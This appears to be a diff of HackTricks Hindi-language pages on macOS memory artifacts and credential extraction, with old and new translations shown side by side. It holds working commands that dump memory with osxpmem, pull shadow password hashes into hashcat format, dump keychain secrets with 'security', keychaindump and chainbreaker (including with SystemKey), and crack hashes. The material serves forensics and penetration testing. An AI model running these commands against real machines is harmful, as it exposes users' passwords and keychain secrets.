* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. * **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details> </details>

View file

@ -2,34 +2,41 @@
<details> <details>
<summary><strong>AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary> <summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
HackTricks का समर्थन करने के अन्य तरीके: HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहत हैं** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह * हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.** * **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)** पर फॉलो** करें।
* **HackTricks** के [**github repos**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके अपनी हैकिंग ट्रिक्स शेयर करें। * **हैकिंग ट्रिक्स साझा करें** द्वारा **पीआर जमा करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
</details> </details>
## मेमोरी आर्टिफैक्ट्स ## मेमोरी आर्टिफैक्ट्स
### स्वैप फाइल्स ### स्वैप फ़ाइलें
* **`/private/var/vm/swapfile0`**: यह फाइल **कैश के रूप में इस्तेमाल होती है जब भौतिक मेमोरी भर जाती है**। भौतिक मेमोरी में डेटा को स्वैपफाइल में धकेला जाता है और फिर जरूरत पड़ने पर भौतिक मेमोरी में वापस स्वैप किया जाता है। यहां एक से अधिक फाइलें मौजूद हो सकती हैं। उदाहरण के लिए, आप swapfile0, swapfile1, आदि देख सकते हैं। स्वैप फ़ाइलें, जैसे `/private/var/vm/swapfile0`, **जब फिजिकल मेमोरी भर जाती है तो कैश के रूप में काम करती हैं**। जब फिजिकल मेमोरी में और जगह नहीं होती, तो उसका डेटा एक स्वैप फ़ाइल में स्थानांतरित किया जाता है और फिर आवश्यकतानुसार फिजिकल मेमोरी में वापस लाया जाता है। एक से अधिक स्वैप फ़ाइलें मौजूद हो सकती हैं, जिनके नाम हो सकते हैं swapfile0, swapfile1, आदि।
* **`/private/var/vm/sleepimage`**: जब OS X **हाइबरनेशन** में जाता है, **मेमोरी में संग्रहित डेटा को sleepimage फाइल में डाल दिया जाता है**। जब उपयोगकर्ता वापस आता है और कंप्यूटर को जगाता है, मेमोरी को sleepimage से पुनर्स्थापित किया जाता है और उपयोगकर्ता वहीं से शुरू कर सकता है जहां वह छोड़ा था।
आधुनिक MacOS सिस्टम्स में डिफ़ॉल्ट रूप से यह फाइल एन्क्रिप्टेड होगी, इसलिए यह पुनर्प्राप्त नहीं हो सकती है। ### हाइबर्नेट इमेज
* हालांकि, इस फाइल का एन्क्रिप्शन अक्षम किया जा सकता है। `sysctl vm.swapusage` का आउटपुट चेक करें `/private/var/vm/sleepimage` पर स्थित फ़ाइल **हाइबर्नेशन मोड** के दौरान महत्वपूर्ण है। **OS X को हाइबर्नेट करते समय मेमोरी से डेटा इस फ़ाइल में स्टोर किया जाता है**। कंप्यूटर को जागने पर, सिस्टम इस फ़ाइल से मेमोरी डेटा प्राप्त करता है, जिससे उपयोगकर्ता जहाँ छोड़ा था वहाँ जारी रख सकता है
### osxpmem के साथ मेमोरी डंपिंग यह ध्यान देने योग्य है कि आधुनिक MacOS सिस्टमों पर, सुरक्षा कारणों से इस फ़ाइल को सामान्यत: एन्क्रिप्ट किया जाता है, जिससे पुनर्प्राप्ति कठिन होती है।
* यदि स्लीपइमेज के लिए एन्क्रिप्शन सक्षम है या नहीं यह जांचने के लिए, कमांड `sysctl vm.swapusage` चलाया जा सकता है। यह दिखाएगा कि क्या फ़ाइल एन्क्रिप्ट की गई है।
### मेमोरी दबाव लॉग
MacOS सिस्टम में एक और महत्वपूर्ण मेमोरी संबंधित फ़ाइल है **मेमोरी दबाव लॉग**। ये लॉग `/var/log` में स्थित होते हैं और सिस्टम के मेमोरी उपयोग और दबाव घटनाओं के बारे में विस्तृत जानकारी शामिल करते हैं। ये मेमोरी संबंधित मुद्दों का निदान करने या समय के साथ सिस्टम के मेमोरी का प्रबंधन कैसे करता है इसको समझने के लिए विशेष रूप से उपयोगी हो सकते हैं।
## osxpmem के साथ मेमोरी डंपिंग
MacOS मशीन में मेमोरी डंप करने के लिए आप [**osxpmem**](https://github.com/google/rekall/releases/download/v1.5.1/osxpmem-2.1.post4.zip) का उपयोग कर सकते हैं। MacOS मशीन में मेमोरी डंप करने के लिए आप [**osxpmem**](https://github.com/google/rekall/releases/download/v1.5.1/osxpmem-2.1.post4.zip) का उपयोग कर सकते हैं।
**नोट**: निम्नलिखित निर्देश केवल Intel आर्किटेक्चर वाले Macs के लिए काम करेंगे। यह टूल अब आर्काइव्ड है और अंतिम रिलीज 2017 में हुई थी। नीचे दिए गए निर्देशों का उपयोग करके डाउनलोड किया गया बाइनरी Intel चिप्स के लिए लक्षित है क्योंकि 2017 में Apple Silicon मौजूद नहीं था। arm64 आर्किटेक्चर के लिए बाइनरी को कंपाइल करना संभव हो सकता है लेकिन आपको खुद ही कोशिश करनी होगी। **ध्यान दें**: निम्नलिखित निर्देश केवल इंटेल आर्किटेक्चर वाले Macs के लिए काम करेंगे। यह टूल अब संग्रहीत है और अंतिम रिलीज 2017 में हुआ था। नीचे दिए गए निर्देशों का उपयोग करके डाउनलोड किया गया बाइनरी इंटेल चिप्स को लक्ष्य बनाता है क्योंकि 2017 में Apple Silicon मौजूद नहीं था। यह संभावना है कि arm64 आर्किटेक्चर के लिए बाइनरी को कंपाइल करना संभव है, लेकिन आपको खुद प्रयास करना होगा
```bash ```bash
#Dump raw format #Dump raw format
sudo osxpmem.app/osxpmem --format raw -o /tmp/dump_mem sudo osxpmem.app/osxpmem --format raw -o /tmp/dump_mem
@ -37,32 +44,32 @@ sudo osxpmem.app/osxpmem --format raw -o /tmp/dump_mem
#Dump aff4 format #Dump aff4 format
sudo osxpmem.app/osxpmem -o /tmp/dump_mem.aff4 sudo osxpmem.app/osxpmem -o /tmp/dump_mem.aff4
``` ```
यदि आपको यह त्रुटि मिलती है: `osxpmem.app/MacPmem.kext failed to load - (libkern/kext) authentication failure (file ownership/permissions); check the system/kernel logs for errors or try kextutil(8)` आप इसे ठीक कर सकते हैं: यदि आपको यह त्रुटि मिलती है: `osxpmem.app/MacPmem.kext failed to load - (libkern/kext) authentication failure (file ownership/permissions); check the system/kernel logs for errors or try kextutil(8)` तो आप इसे ठीक कर सकते हैं:
```bash ```bash
sudo cp -r osxpmem.app/MacPmem.kext "/tmp/" sudo cp -r osxpmem.app/MacPmem.kext "/tmp/"
sudo kextutil "/tmp/MacPmem.kext" sudo kextutil "/tmp/MacPmem.kext"
#Allow the kext in "Security & Privacy --> General" #Allow the kext in "Security & Privacy --> General"
sudo osxpmem.app/osxpmem --format raw -o /tmp/dump_mem sudo osxpmem.app/osxpmem --format raw -o /tmp/dump_mem
``` ```
**अन्य त्रुटियां** को "Security & Privacy --> General" में **kext को लोड करने की अनुमति देकर** ठीक किया जा सकता है, बस इसे **अनुमति दें** **अन्य त्रुटियाँ** को "सुरक्षा और गोपनीयता --> सामान्य" में **kext को लोड करने की अनुमति देने** से ठीक किया जा सकता है, बस **अनुमति** दें।
आप इस **oneliner** का उपयोग करके एप्लिकेशन डाउनलोड करने, kext को लोड करने और मेमोरी डंप करने के लिए भी कर सकते हैं: आप इस **वनलाइनर** का उपयोग करके एप्लिकेशन डाउनलोड कर सकते हैं, kext लोड कर सकते हैं और मेमोरी डंप कर सकते हैं:
{% code overflow="wrap" %}
```bash ```bash
sudo su sudo su
cd /tmp; wget https://github.com/google/rekall/releases/download/v1.5.1/osxpmem-2.1.post4.zip; unzip osxpmem-2.1.post4.zip; chown -R root:wheel osxpmem.app/MacPmem.kext; kextload osxpmem.app/MacPmem.kext; osxpmem.app/osxpmem --format raw -o /tmp/dump_mem cd /tmp; wget https://github.com/google/rekall/releases/download/v1.5.1/osxpmem-2.1.post4.zip; unzip osxpmem-2.1.post4.zip; chown -R root:wheel osxpmem.app/MacPmem.kext; kextload osxpmem.app/MacPmem.kext; osxpmem.app/osxpmem --format raw -o /tmp/dump_mem
``` ```
{% endcode %}
<details> <details>
<summary><strong>AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary> <summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
HackTricks का समर्थन करने के अन्य तरीके: HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहत हैं** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)!
* [**आधिकारिक PEASS & HackTricks स्वैग प्राप्त करें**](https://peass.creator-spring.com) * [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एक्सक्लूसिव [**NFTs**](https://opensea.io/collection/the-peass-family) का संग्रह * हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.** * **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)** पर फॉलो** करें।
* [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके अपनी हैकिंग ट्रिक्स शेयर करें * **अपने हैकिंग ट्रिक्स साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके।
</details> </details>

View file

@ -2,47 +2,42 @@
<details> <details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
HackTricks का समर्थन करने के अन्य तरीके: HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहत हैं** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह * हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.** * **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** ट्विटर पर **फॉलो** करें 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें। * **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details> </details>
## पासवर्ड ## पासवर्ड
### शैडो पासवर्ड ### छाया पासवर्ड
शैडो पासवर्ड **`/var/db/dslocal/nodes/Default/users/`** में स्थित plists में उपयोगकर्ता के कॉन्फ़िगरेशन के साथ संग्रहीत होता है।\ छाया पासवर्ड उपयोगकर्ता के विन्यास के साथ **`/var/db/dslocal/nodes/Default/users/`** में स्थित plists में संग्रहीत होता है।\
निम्नलिखित oneliner का उपयोग **सभी उपयोगकर्ताओं के बारे में जानकारी** (हैश जानकारी सहित) डंप करने के लिए किया जा सकता है: निम्नलिखित वनलाइनर का उपयोग किया जा सकता है **सभी उपयोगकर्ताओं के बारे में सभी जानकारी को डंप करने** के लिए (हैश जानकारी सहित):
{% code overflow="wrap" %} {% code overflow="wrap" %}
```bash ```bash
for l in /var/db/dslocal/nodes/Default/users/*; do if [ -r "$l" ];then echo "$l"; defaults read "$l"; fi; done for l in /var/db/dslocal/nodes/Default/users/*; do if [ -r "$l" ];then echo "$l"; defaults read "$l"; fi; done
``` ```
```bash
dscl . list /Users | grep -v '^_' | while read user; do echo -n "$user:"; dscl . -read /Users/$user dsAttrTypeNative:ShadowHashData | tr -d ' ' | cut -d '[' -f2 | cut -d ']' -f1 | xxd -r -p | base64; echo; done
```
{% endcode %} {% endcode %}
[**इस तरह की स्क्रिप्ट्स**](https://gist.github.com/teddziuba/3ff08bdda120d1f7822f3baf52e606c2) या [**यह वाली**](https://github.com/octomagon/davegrohl.git) का उपयोग करके हैश को **hashcat** **प्रारूप** में परिवर्तित किया जा सकता है। [**इस तरह के स्क्रिप्ट**](https://gist.github.com/teddziuba/3ff08bdda120d1f7822f3baf52e606c2) या [**यह एक**](https://github.com/octomagon/davegrohl.git) का उपयोग **हैश** को **हैशकैट** **स्वरूप** में बदलने के लिए किया जा सकता है।
सभी गैर-सेवा खातों के क्रेडेंशियल्स को hashcat प्रारूप `-m 7100` (macOS PBKDF2-SHA512) में डंप करने के लिए एक वैकल्पिक वन-लाइनर: एक वैकल्पिक वन-लाइनर जो सभी गैर-सेवा खातों के क्रेडेंशियल को हैशकैट स्वरूप में डंप करेगा `-m 7100` (macOS PBKDF2-SHA512):
{% code overflow="wrap" %} {% code overflow="wrap" %}
```bash ```bash
sudo bash -c 'for i in $(find /var/db/dslocal/nodes/Default/users -type f -regex "[^_]*"); do plutil -extract name.0 raw $i | awk "{printf \$0\":\$ml\$\"}"; for j in {iterations,salt,entropy}; do l=$(k=$(plutil -extract ShadowHashData.0 raw $i) && base64 -d <<< $k | plutil -extract SALTED-SHA512-PBKDF2.$j raw -); if [[ $j == iterations ]]; then echo -n $l; else base64 -d <<< $l | xxd -p -c 0 | awk "{printf \"$\"\$0}"; fi; done; echo ""; done' sudo bash -c 'for i in $(find /var/db/dslocal/nodes/Default/users -type f -regex "[^_]*"); do plutil -extract name.0 raw $i | awk "{printf \$0\":\$ml\$\"}"; for j in {iterations,salt,entropy}; do l=$(k=$(plutil -extract ShadowHashData.0 raw $i) && base64 -d <<< $k | plutil -extract SALTED-SHA512-PBKDF2.$j raw -); if [[ $j == iterations ]]; then echo -n $l; else base64 -d <<< $l | xxd -p -c 0 | awk "{printf \"$\"\$0}"; fi; done; echo ""; done'
``` ```
{% endcode %} ### कीचेन डंप
### Keychain Dump ध्यान दें कि सुरक्षा बाइनरी का उपयोग करके **पासवर्ड डिक्रिप्ट करने के लिए** कई प्रॉम्प्ट उपयोगकर्ता से इस ऑपरेशन की अनुमति देने के लिए पूछेगा।
ध्यान दें कि security बाइनरी का उपयोग करते समय **पासवर्ड्स को डिक्रिप्टेड करके डंप करने** के लिए, कई प्रॉम्प्ट्स उपयोगकर्ता से इस ऑपरेशन की अनुमति मांगेंगे।
```bash ```bash
#security #security
secuirty dump-trust-settings [-s] [-d] #List certificates secuirty dump-trust-settings [-s] [-d] #List certificates
@ -54,42 +49,44 @@ security dump-keychain -d #Dump all the info, included secrets (the user will be
### [Keychaindump](https://github.com/juuso/keychaindump) ### [Keychaindump](https://github.com/juuso/keychaindump)
{% hint style="danger" %} {% hint style="danger" %}
इस टिप्पणी के आधार पर [juuso/keychaindump#10 (टिप्पणी)](https://github.com/juuso/keychaindump/issues/10#issuecomment-751218760) ऐसा लगता है कि ये उपकरण Big Sur में अब काम नहीं कर रहे हैं। इस टिप्पणी के आधार पर [juuso/keychaindump#10 (comment)](https://github.com/juuso/keychaindump/issues/10#issuecomment-751218760) यह लगता है कि ये उपकरण अब बिग सर में काम नहीं कर रहे हैं।
{% endhint %} {% endhint %}
हमलावर को अभी भी सिस्टम तक पहुँचने की जरूरत है और **keychaindump** चलाने के लिए **root** विशेषाधिकारों तक बढ़ाना होगा। इस दृष्टिकोण में अपनी शर्तें हैं। जैसा कि पहले उल्लेख किया गया है, **लॉगिन पर आपका कीचेन डिफ़ॉल्ट रूप से अनलॉक हो जाता है** और जब आप अपने सिस्टम का उपयोग करते हैं तो अनलॉक रहता है। यह सुविधा के लिए है ताकि उपयोगकर्ता को हर बार जब एक एप्लिकेशन कीचेन तक पहुँचना चाहता है तो उसे अपना पासवर्ड दर्ज नहीं करना पड़े। अगर उपयोगकर्ता ने इस सेटिंग को बदल दिया है और हर उपयोग के बाद कीचेन को लॉक करने का चुनाव किया है, तो keychaindump अब काम नहीं करेगा; यह एक अनलॉक कीचेन पर निर्भर करता है ताकि काम कर सके। ### Keychaindump Overview
Keychaindump कैसे पासवर्ड को मेमोरी से निकालता है यह समझना महत्वपूर्ण है। इस लेन-देन में सबसे महत्वपूर्ण प्रक्रिया ”**securityd**“ **प्रक्रिया** है। Apple इस प्रक्रिया को **प्राधिकरण और क्रिप्टोग्राफिक ऑपरेशनों के लिए एक सुरक्षा संदर्भ डेमन** के रूप में संदर्भित करता है। Apple डेवलपर लाइब्रेरीज़ इसके बारे में बहुत कुछ नहीं बताती हैं; हालांकि, वे हमें बताते हैं कि securityd कीचेन तक पहुँच को संभालता है। अपने शोध में, Juuso कीचेन को डिक्रिप्ट करने के लिए जरूरी कुंजी को ”The Master Key“ के रूप में संदर्भित करता है। इस कुंजी को प्राप्त करने के लिए कई कदम उठाने की जरूरत है क्योंकि यह उपयोगकर्ता के OS X लॉगिन पासवर्ड से निकाला जाता है। अगर आप कीचेन फाइल को पढ़ना चाहते हैं तो आपके पास यह मास्टर कुंजी होनी चाहिए। इसे प्राप्त करने के लिए निम्नलिखित कदम किए जा सकते हैं। **securityd के हीप का स्कैन करें (keychaindump यह vmmap कमांड के साथ करता है)**। संभावित मास्टर कुंजियाँ MALLOC\_TINY के रूप में चिह्नित क्षेत्र में संग्रहीत होती हैं। आप इन हीप्स के स्थानों को निम्नलिखित कमांड के साथ स्वयं देख सकते हैं: एक उपकरण जिसे **keychaindump** नाम से विकसित किया गया है, मैकओएस की कीचेन से पासवर्ड निकालने के लिए है, लेकिन नए मैकओएस संस्करणों जैसे बिग सर पर सीमाएं हैं, जैसा कि एक [चर्चा](https://github.com/juuso/keychaindump/issues/10#issuecomment-751218760) में इंगित किया गया है। **keychaindump** का उपयोग अटैकर को **रूट** तक पहुंचने और वर्चस्व को बढ़ाने की आवश्यकता है। यह उपकरण उस तथ्य का शोषण करता है कि कीचेन डिफ़ॉल्ट रूप से उपयोगकर्ता लॉगिन के बाद अनलॉक होता है ताकि अनुकूलता के लिए, एप्लिकेशन को उपयोक्ता के पासवर्ड को बार-बार नहीं मांगने की आवश्यकता न हो। हालांकि, अगर एक उपयोक्ता हर उपयोग के बाद अपनी कीचेन को लॉक करने का विकल्प चुनता है, तो **keychaindump** अप्रभावी हो जाता है।
**Keychaindump** एक विशेष प्रक्रिया को लक्ष्य बनाकर काम करता है जिसे **securityd** कहा जाता है, जिसे Apple ने अधिकृति और गणितीय कार्यों के लिए डेमन के रूप में वर्णित किया है, जो कीचेन तक पहुंचने के लिए महत्वपूर्ण है। निकालने की प्रक्रिया में उपयोगकर्ता के लॉगिन पासवर्ड से निकली एक **मास्टर की** की पहचान करना शामिल है। यह कुंजी कीचेन फ़ाइल को पढ़ने के लिए आवश्यक है। **keychaindump** उपयोगकर्ता के लॉगिन पासवर्ड से निकली एक **मास्टर की** की खोज करता है, **keychaindump** `vmmap` कमांड का उपयोग करके **securityd** की मेमोरी हीप को स्कैन करता है, `MALLOC_TINY` के रूप में झंझट किए गए क्षेत्रों में संभावित कुंजियों की खोज करता है। इन मेमोरी स्थानों की जांच के लिए निम्नलिखित कमांड का उपयोग किया जाता है:
```bash ```bash
sudo vmmap <securityd PID> | grep MALLOC_TINY sudo vmmap <securityd PID> | grep MALLOC_TINY
``` ```
**Keychaindump** तब वापस आए हीप्स में 0x0000000000000018 की घटनाओं की खोज करेगा। अगर अगला 8-बाइट मान वर्तमान हीप की ओर इशारा करता है, तो हमने एक संभावित मास्टर की पाई है। यहाँ से थोड़ा डिओब्फस्केशन अभी भी होना आवश्यक है जो सोर्स कोड में देखा जा सकता है, लेकिन एक विश्लेषक के रूप में सबसे महत्वपूर्ण बात यह है कि इस जानकारी को डिक्रिप्ट करने के लिए आवश्यक डेटा securityd की प्रोसेस मेमोरी में संग्रहीत होता है। यहाँ keychain dump आउटपुट का एक उदाहरण है। उम्मीदवार मास्टर कुंजियों की संभावित कुंजियों की पहचान के बाद, **keychaindump** विशेष पैटर्न (`0x0000000000000018`) के लिए हीप्स के माध्यम से खोज करता है जो मास्टर कुंजी के लिए उम्मीदवार को दर्शाता है। इस कुंजी का उपयोग करने के लिए और भी कदम आवश्यक है, जैसा कि **keychaindump** के स्रोत कोड में विस्तार से वर्णित है। इस क्षेत्र पर ध्यान केंद्रित विश्लेषकों को ध्यान देना चाहिए कि कुंजीचैन को डिक्रिप्ट करने के लिए महत्वपूर्ण डेटा **securityd** प्रक्रिया की मेमोरी में संग्रहित है। **keychaindump** चलाने के लिए एक उदाहरण कमांड है:
```bash ```bash
sudo ./keychaindump sudo ./keychaindump
``` ```
### chainbreaker ### चेनब्रेकर
[**Chainbreaker**](https://github.com/n0fate/chainbreaker) का उपयोग निम्नलिखित प्रकार की जानकारी को OSX keychain से फोरेंसिक रूप से सही तरीके से निकालने के लिए किया जा सकता है: [**Chainbreaker**](https://github.com/n0fate/chainbreaker) का उपयोग एक फोरेंसिक तरीके से OSX कीचेन से निम्नलिखित प्रकार की जानकारी निकालने के लिए किया जा सकता है:
* हैश्ड Keychain पासवर्ड, [hashcat](https://hashcat.net/hashcat/) या [John the Ripper](https://www.openwall.com/john/) के साथ क्रैकिंग के लिए उपयुक्त * हैश वाला Keychain पासवर्ड, [hashcat](https://hashcat.net/hashcat/) या [John the Ripper](https://www.openwall.com/john/) के साथ क्रैकिंग के लिए उपयुक्त
* इंटरनेट पासवर्ड * इंटरनेट पासवर्ड
* जेनेरिक पासवर्ड * जेनेरिक पासवर्ड
* प्राइवेट कीज़ * निजी कुंजी
* पब्लिक कीज़ * सार्वजनिक कुंजी
* X509 सर्टिफिकेट्स * X509 प्रमाणपत्र
* सिक्योर नोट्स * सुरक्षित नोट्स
* Appleshare पासवर्ड * एप्पलशेयर पासवर्ड
Keychain अनलॉक पासवर्ड, [volafox](https://github.com/n0fate/volafox) या [volatility](https://github.com/volatilityfoundation/volatility) का उपयोग करके प्राप्त मास्टर की, या SystemKey जैसी अनलॉक फाइल दी गई हो, तो Chainbreaker प्लेनटेक्स्ट पासवर्ड भी प्रदान करेगा। Keychain अनलॉक पासवर्ड, [volafox](https://github.com/n0fate/volafox) या [volatility](https://github.com/volatilityfoundation/volatility) से प्राप्त मास्टर कुंजी, या SystemKey जैसा एक अनलॉक फ़ाइल के साथ, चेनब्रेकर भी प्लेनटेक्स्ट पासवर्ड प्रदान करेगा।
इनमें से किसी भी तरीके से Keychain को अनलॉक किए बिना, Chainbreaker सभी अन्य उपलब्ध जानकारी दिखाएगा। इनमें से किसी एक तरीके से Keychain को अनलॉक किया बिना, चेनब्रेकर सभी अन्य उपलब्ध जानकारी प्रदर्शित करेगा।
### **Dump keychain keys** #### **Keychain कुंजियों को डंप करें**
```bash ```bash
#Dump all keys of the keychain (without the passwords) #Dump all keys of the keychain (without the passwords)
python2.7 chainbreaker.py --dump-all /Library/Keychains/System.keychain python2.7 chainbreaker.py --dump-all /Library/Keychains/System.keychain
``` ```
### **SystemKey के साथ keychain कुंजियों (पासवर्ड के साथ) का डंप** #### **सिस्टमकी के साथ कीचेन कुंजी (साथ में पासवर्ड) डंप करें**
```bash ```bash
# First, get the keychain decryption key # First, get the keychain decryption key
# To get this decryption key you need to be root and SIP must be disabled # To get this decryption key you need to be root and SIP must be disabled
@ -97,7 +94,7 @@ hexdump -s 8 -n 24 -e '1/1 "%.2x"' /var/db/SystemKey && echo
## Use the previous key to decrypt the passwords ## Use the previous key to decrypt the passwords
python2.7 chainbreaker.py --dump-all --key 0293847570022761234562947e0bcd5bc04d196ad2345697 /Library/Keychains/System.keychain python2.7 chainbreaker.py --dump-all --key 0293847570022761234562947e0bcd5bc04d196ad2345697 /Library/Keychains/System.keychain
``` ```
### **कीचेन कुंजियों को डंप करना (पासवर्ड के साथ) हैश को क्रैक करना** #### **कुंजीथल कुंजी (साथ में पासवर्ड) को डंप करें हैश को क्रैक करें**
```bash ```bash
# Get the keychain hash # Get the keychain hash
python2.7 chainbreaker.py --dump-keychain-password-hash /Library/Keychains/System.keychain python2.7 chainbreaker.py --dump-keychain-password-hash /Library/Keychains/System.keychain
@ -106,9 +103,9 @@ hashcat.exe -m 23100 --keep-guessing hashes.txt dictionary.txt
# Use the key to decrypt the passwords # Use the key to decrypt the passwords
python2.7 chainbreaker.py --dump-all --key 0293847570022761234562947e0bcd5bc04d196ad2345697 /Library/Keychains/System.keychain python2.7 chainbreaker.py --dump-all --key 0293847570022761234562947e0bcd5bc04d196ad2345697 /Library/Keychains/System.keychain
``` ```
### **मेमोरी डंप के साथ keychain कुंजियों (पासवर्ड के साथ) को डंप करें** #### **मेमोरी डंप के साथ कीचेन कुंजी (पासवर्ड के साथ) डंप करें**
[इन चरणों का पालन करें](..#dumping-memory-with-osxpmem) **मेमोरी डंप** करने के लिए [इन चरणों का पालन करें](..#dumping-memory-with-osxpmem) एक **मेमोरी डंप** करने के लिए
```bash ```bash
#Use volafox (https://github.com/n0fate/volafox) to extract possible keychain passwords #Use volafox (https://github.com/n0fate/volafox) to extract possible keychain passwords
# Unformtunately volafox isn't working with the latest versions of MacOS # Unformtunately volafox isn't working with the latest versions of MacOS
@ -117,23 +114,23 @@ python vol.py -i ~/Desktop/show/macosxml.mem -o keychaindump
#Try to extract the passwords using the extracted keychain passwords #Try to extract the passwords using the extracted keychain passwords
python2.7 chainbreaker.py --dump-all --key 0293847570022761234562947e0bcd5bc04d196ad2345697 /Library/Keychains/System.keychain python2.7 chainbreaker.py --dump-all --key 0293847570022761234562947e0bcd5bc04d196ad2345697 /Library/Keychains/System.keychain
``` ```
